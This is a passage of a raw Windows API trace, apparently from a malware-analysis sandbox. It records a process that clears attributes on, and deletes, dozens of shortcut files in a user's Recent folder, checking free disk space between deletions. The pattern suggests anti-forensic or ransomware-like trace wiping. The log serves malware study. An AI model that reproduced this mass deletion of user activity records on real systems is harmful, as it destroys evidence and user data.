(lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\5aYTN_XxDj4Z.lnk", dwFileAttributes=0x80) returned 1 [0149.774] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\5aYTN_XxDj4Z.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\5aytn_xxdj4z.lnk")) returned 1 [0149.777] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0149.783] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\5hTCvw4ej.lnk", dwFileAttributes=0x80) returned 1 [0149.783] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\5hTCvw4ej.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\5htcvw4ej.lnk")) returned 1 [0149.786] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0149.794] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\5Qxw2A9l.lnk", dwFileAttributes=0x80) returned 1 [0149.794] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\5Qxw2A9l.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\5qxw2a9l.lnk")) returned 1 [0149.797] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0149.802] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\6OnZWN8PiEwFKyH7zZ.lnk", dwFileAttributes=0x80) returned 1 [0149.803] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\6OnZWN8PiEwFKyH7zZ.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\6onzwn8piewfkyh7zz.lnk")) returned 1 [0149.805] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0149.811] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\7 4z.lnk", dwFileAttributes=0x80) returned 1 [0149.811] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\7 4z.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\7 4z.lnk")) returned 1 [0149.814] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0149.819] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\8biZbemaWgDFR.lnk", dwFileAttributes=0x80) returned 1 [0149.819] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\8biZbemaWgDFR.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\8bizbemawgdfr.lnk")) returned 1 [0149.822] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0149.828] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\92jXSnPykeEjWCy.flv.lnk", dwFileAttributes=0x80) returned 1 [0149.828] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\92jXSnPykeEjWCy.flv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\92jxsnpykeejwcy.flv.lnk")) returned 1 [0149.831] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0149.837] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\97UE08p I0.lnk", dwFileAttributes=0x80) returned 1 [0149.837] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\97UE08p I0.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\97ue08p i0.lnk")) returned 1 [0149.840] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0149.845] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\99q8DF.lnk", dwFileAttributes=0x80) returned 1 [0149.846] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\99q8DF.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\99q8df.lnk")) returned 1 [0149.848] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0149.854] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\9LVTI2Lx.lnk", dwFileAttributes=0x80) returned 1 [0149.854] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\9LVTI2Lx.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\9lvti2lx.lnk")) returned 1 [0149.857] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0149.862] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\a2jq.lnk", dwFileAttributes=0x80) returned 1 [0149.863] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\a2jq.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\a2jq.lnk")) returned 1 [0149.865] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0149.872] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\acBQx0ManDP8NfU87cmD.lnk", dwFileAttributes=0x80) returned 1 [0149.891] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\acBQx0ManDP8NfU87cmD.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\acbqx0mandp8nfu87cmd.lnk")) returned 1 [0150.036] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.057] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\APC-W2.lnk", dwFileAttributes=0x80) returned 1 [0150.058] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\APC-W2.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\apc-w2.lnk")) returned 1 [0150.060] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.070] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\b QPH.lnk", dwFileAttributes=0x80) returned 1 [0150.070] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\b QPH.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\b qph.lnk")) returned 1 [0150.073] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.078] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\b4u 8.ots.lnk", dwFileAttributes=0x80) returned 1 [0150.079] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\b4u 8.ots.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\b4u 8.ots.lnk")) returned 1 [0150.081] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.086] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\bC_DmmJxlLv.flv.lnk", dwFileAttributes=0x80) returned 1 [0150.087] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\bC_DmmJxlLv.flv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\bc_dmmjxllv.flv.lnk")) returned 1 [0150.089] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.095] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\bkazxn-tWvb.lnk", dwFileAttributes=0x80) returned 1 [0150.095] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\bkazxn-tWvb.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\bkazxn-twvb.lnk")) returned 1 [0150.098] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.103] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\BpvwK84ed6Sn97sXC.flv.lnk", dwFileAttributes=0x80) returned 1 [0150.103] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\BpvwK84ed6Sn97sXC.flv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\bpvwk84ed6sn97sxc.flv.lnk")) returned 1 [0150.111] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.117] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\bVSn.lnk", dwFileAttributes=0x80) returned 1 [0150.117] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\bVSn.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\bvsn.lnk")) returned 1 [0150.120] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.129] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\c tvSlTE_1c2y7.lnk", dwFileAttributes=0x80) returned 1 [0150.129] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\c tvSlTE_1c2y7.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\c tvslte_1c2y7.lnk")) returned 1 [0150.132] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.136] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Cf63_9nmz6NBY.lnk", dwFileAttributes=0x80) returned 1 [0150.137] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Cf63_9nmz6NBY.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\cf63_9nmz6nby.lnk")) returned 1 [0150.140] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.144] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\cf6GRRZ51MHhr.lnk", dwFileAttributes=0x80) returned 1 [0150.145] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\cf6GRRZ51MHhr.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\cf6grrz51mhhr.lnk")) returned 1 [0150.148] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.153] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\cIg2znE6YnCidJF TVHf.lnk", dwFileAttributes=0x80) returned 1 [0150.153] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\cIg2znE6YnCidJF TVHf.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\cig2zne6yncidjf tvhf.lnk")) returned 1 [0150.156] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.161] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CTNATDjNglIKg4hHmo.lnk", dwFileAttributes=0x80) returned 1 [0150.161] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CTNATDjNglIKg4hHmo.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ctnatdjnglikg4hhmo.lnk")) returned 1 [0150.164] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.171] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\DAyjxOXEDc2vddOfQDII.lnk", dwFileAttributes=0x80) returned 1 [0150.172] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\DAyjxOXEDc2vddOfQDII.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\dayjxoxedc2vddofqdii.lnk")) returned 1 [0150.174] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.187] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ddNpUN.lnk", dwFileAttributes=0x80) returned 1 [0150.187] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ddNpUN.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ddnpun.lnk")) returned 1 [0150.190] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.195] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\dEW3BCITFUKdNr.lnk", dwFileAttributes=0x80) returned 1 [0150.195] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\dEW3BCITFUKdNr.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\dew3bcitfukdnr.lnk")) returned 1 [0150.198] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.203] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\DpA0AxhT1 C.flv.lnk", dwFileAttributes=0x80) returned 1 [0150.204] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\DpA0AxhT1 C.flv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\dpa0axht1 c.flv.lnk")) returned 1 [0150.206] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.211] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\E1SG.lnk", dwFileAttributes=0x80) returned 1 [0150.212] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\E1SG.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\e1sg.lnk")) returned 1 [0150.215] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.220] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\EIUyC0V9J.lnk", dwFileAttributes=0x80) returned 1 [0150.220] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\EIUyC0V9J.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\eiuyc0v9j.lnk")) returned 1 [0150.223] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.228] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ekMcgxfMAo6bN17bvj.lnk", dwFileAttributes=0x80) returned 1 [0150.228] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\ekMcgxfMAo6bN17bvj.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\ekmcgxfmao6bn17bvj.lnk")) returned 1 [0150.231] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.236] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Em EJk3GYZXqiP.lnk", dwFileAttributes=0x80) returned 1 [0150.237] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Em EJk3GYZXqiP.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\em ejk3gyzxqip.lnk")) returned 1 [0150.239] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0150.245] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\eM xNObhytpC5.lnk", dwFileAttributes=0x80) returned 1 [0150.245] DeleteFileW 